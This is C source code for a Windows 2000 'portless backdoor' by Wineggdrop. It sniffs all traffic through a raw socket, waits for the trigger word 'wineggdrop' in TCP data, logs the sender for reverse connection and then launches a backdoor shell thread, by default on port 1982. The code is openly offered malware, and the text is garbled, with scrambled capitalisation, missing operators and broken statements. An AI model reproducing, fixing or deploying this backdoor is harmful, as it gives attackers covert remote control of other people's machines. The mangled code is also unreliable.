// ******************************************************** ********************* // Version: v1.0 // CODER: Wineggdrop // Date Release: null // purpose: To Demonstrate Some Portless Backdoor Technique // Test Platform: Win 2K Pro and Server SP4 // Compiled ON: LCC 3.0, May Compile ON VC 6.0 (Not test yet) // *************************** *********************************************************** *
#include
// some structures to define # define ip_hdrincl 2 # define sio_rcvall _wsaiow (ioc_vendor, 1) #define max_pa_len 65535 # define max_addr_len 16 # define max_hostname_lan 255
typedef struct _iphdr {unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP;} IP_HEADER;
typedef struct _tcphdr {USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp;} TCP_HEADER; // End Of Structure
// Global VariableChar SourceIpaddress [MAX_ADDR_LEN]; // Hold The Source IP (this Can Be Used To Do Reverse Connection) INT Backdoorport = 0; // The Port Back Door Will Bind
// Function prototype declaration // ------------------------------------------- -------------------------------------------------- --------- BOOL InitSocket (); BOOL DoSniffing (); BOOL DecodeIPPack (const char * Buffer, const int BufferSize); BOOL DecodeTCPPack (const char * TCPBuffer, const int BufferSize); BOOL IsWin2KOrAbove (); DWORD WINAPI StartBackDoor (LPVOID Para); BOOL GetABackDoorShell (const SOCKET ListenSocket); BOOL SendSocket (const SOCKET ClientSocket, const char * Message); unsigned int ReceiveMessageFromSocket (const SOCKET ClientSocket, char * Buffer, const int BufferSize); // - -------------------------------------------------- -------------------------------------------------- // End Of fucntion ProtoType Declaration // main Functionint main (int argc, char * argv []) {if (! IsWin2KOrAbove ()) // This System Running This Program Is Not Win 2K Or Above {printf ( "The Program Must Run Under Win 2k or Above OS / N "); // Display this message return -1; // quit the program}
IF (Argc == 2) // We get argument backdoorport = atoi (argv [1]); // argument one is the back door's port else // no argument backdoorport = 1982; // back door's port will be defined on 1982
IF (! INITSOCKET ()) // Fail to Initize Socket {Printf ("Fail to Start Up Winsock / N"); // Display Error Message Return -1; // Quit the Program} DOSNIFFING (); // DO Sniffeng Return 0; // quit the program} // end of main function
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to itize socket // Return Type: Boolean // Parameters: null // this is to simple, I Won't comment it // ------------------------------------------------------------------------------------------------------------------------------------------------ ------------------------------ BOOL INITSOCKET () {Wsadata Data; Word Ver; Ver = MakeWord (2, 2) ; If (WSAStartup (Ver, & Data)! = 0) {return false;} // end of initsocket function
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to do none-driver sniffing // return type: boolean // parameters: null // -------------------------------------------------- --------------------- Bool dosnifing () {Int longth = 0; // variable to hold the receive buffer length char recvbuf [max_pack_len] = {0}; // receive buffer socket socketraw = invalid_socket; // raw socket
Socketraw = socket (AF_INET, SOCK_RAW, IPPROTO_IP); // Create a Raw Socket IF (SocketRaw == Invalid_socket) // Fail to Create a Raw Socket {Printf ("Fail to Create A Raw Socket / N"); // Display Error Message Return False; // Return False}
Char far name [max_hostname_lan];
IF (gethostname (name, max_hostname_lan) == Socket_ERROR) // Fail to get the host name {printf ("fail to get host name / n"); // Display error message clossoSocket (socketraw); // Close the Raw Socket Created Return False; // Return False}
// The Below Is The NIC Stuff struct hostent FAR * pHostent; pHostent = (struct hostent *) malloc (sizeof (struct hostent)); // Allocate Hostent Buffer pHostent = gethostbyname (name); SOCKADDR_IN sa; sa.sin_family = AF_INET ; // That's Internet = htons (0); // Any Port avariable on the OS if (phostent-> h_addr_list [0]! = 0) // We Only Check The First Nic {Memcpy (& sa.sin_addr .S_un.s_addr, phostent-> h_addr_list [0], phostent-> h_length); // We use the first nic as the sniffing subject} else // Well, The first nic is not valid {printf ("Get Host by Name Fails / n "); // Display Error Message Free (PHOSTENT); // Free The Hostent Buffer CloseSocket (SocketRaw); Return False; // Return False;} Free (Phostent); // Free The Hostent Bufferif (Bind SocketRaw, (PSOCKADDR) & SA, SIZEOF (SA)) == SOCKET_ERROR) // Bind The Raw Socket On The First NIC, But Fails {Printf ("Fail To Bind / N"); // Display Error Message CloseSocket (Socketr AW); // Close The Raw Socket Return False; // Return False}
// Forget About The Below a Few Lines, They Are Just A Static Routine To Do The None_Driver Sniffing (Some Sort of Must-Have "DWORD DWBufferlen [10]; DWORD DWBUFFERINLEN = 1; DWORD DWBYTESRETURNED = 0;
if (WSAIoctl (SocketRaw, SIO_RCVALL, & dwBufferInLen, sizeof (dwBufferInLen), & dwBufferLen, sizeof (dwBufferLen), & dwBytesReturned, NULL, NULL) == SOCKET_ERROR) {closesocket (SocketRaw); return FALSE;}
While (true) // sniffing starts here with forever loop {membSet (Recvbuf, 0, sizeof (recvbuf)); // reset the receive buffer length = Recv (socketraw, recvbuf, sizeof (recvbuf), 0); // Try To Receive Data if (Length == SOCKET_ERROR) // Get Error As Receiving Data {printf ( "Fail To Receive Data / n"); // Display Error Message break; // Leave The Loop} if (DecodeIPPack (recvBuf, Length )) // Decode The Buffer Received, And The Active Code Is Found {printf ( "Bingo, The BackDoor Is Activated On Port% d / n", BackDoorPort); // We Are Going To Activate The BackDoor DWORD dwThreadID; HANDLE BackDoorThread = CreateThread (NULL, 0, & StartBackDoor, NULL, 0, & dwThreadID); // Create The Back Door Thread WaitForSingleObject (BackDoorThread, INFINITE); // Wait Until The Back Door Ends}} closesocket (SocketRaw); // Close The Raw Socket Return True; // Return} // end of dosniffeng function
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to decode the ip packer // Return Type: Boolean // Parameters: 1.const char * buffer -> The received buffer // 2.const int bufferSize -> The receive buffer size // -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------- Bool Decodeippack (const char * Buffer, const int BufferSize) {IP_HEADER * pIpheader; // IP Header SOCKADDR_IN saSource, saDest; pIpheader = (IP_HEADER *) Buffer; // Transfer The Buffer Into IP Header Form int Protocol = pIpheader-> proto; // Get The Protocol if ((Protocol = IPPROTO_TCP)!) // Not TCP Protocol {return FALSE; // return False Since We Only Interest In TCP Protocol} saSource.sin_addr.s_addr = pIpheader-> sourceIP; strncpy (SourceIPAddress, inet_ntoa (saSource. SIN_ADDR), MAX_ADDR_LEN); // Get The Source IP (Important for Doing Reverse Connection)
int IPLength = sizeof (unsigned long) * (pIpheader-> h_lenver & 0xf); // Get The IP Length return DecodeTCPPack (Buffer IPLength, BufferSize); // Decode TCP Packer} // End Of DecodeIPPack Function
/ / -------------------------------------------------------------------------------------------- ------------------------- // Purpose: to decode the TCP Packer // Return Type: Boolean // Parameters: 1.const char * TCPBuffer -> The tcp buffer // 2.const int bufferSize -> The tcp buffer size // ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------- Bool Decodetcppck (Const Char * TCPBuffer, const Int buffersize {TCP_HEADER * PTCPHEADER; // TCP Header Int ISourcePort, IDestport; // Source Port and Destport
pTcpHeader = (TCP_HEADER *) TCPBuffer; // Transfer The Buffer Into TCP Header Form int TcpHeaderLen = pTcpHeader-> th_lenres >> 4; // Get The TCP Leader Length TcpHeaderLen * = sizeof (unsigned long); char * TcpData = TCPBuffer TcpHeaderLen; // Get The TCP DataiSourcePort = ntohs (pTcpHeader-> th_sport); // Get The Source Port iDestPort = ntohs (pTcpHeader-> th_dport); // Get The Destination Port if (strstr (TcpData, "wineggdrop")! = NULL) // if The TCP Data Contains a Word "WineggDrop", The Bingo {Printf ("% s:% D -> Local:% D / R / N", SourceIpaddress, ISourceport, Idestport ); // display a message return; // Return True (The Back Door Will Be Activated Soon)} Return False; // We Didn't Receive An Active Code, Return False} // End of Decodetcpck Function [CODE]
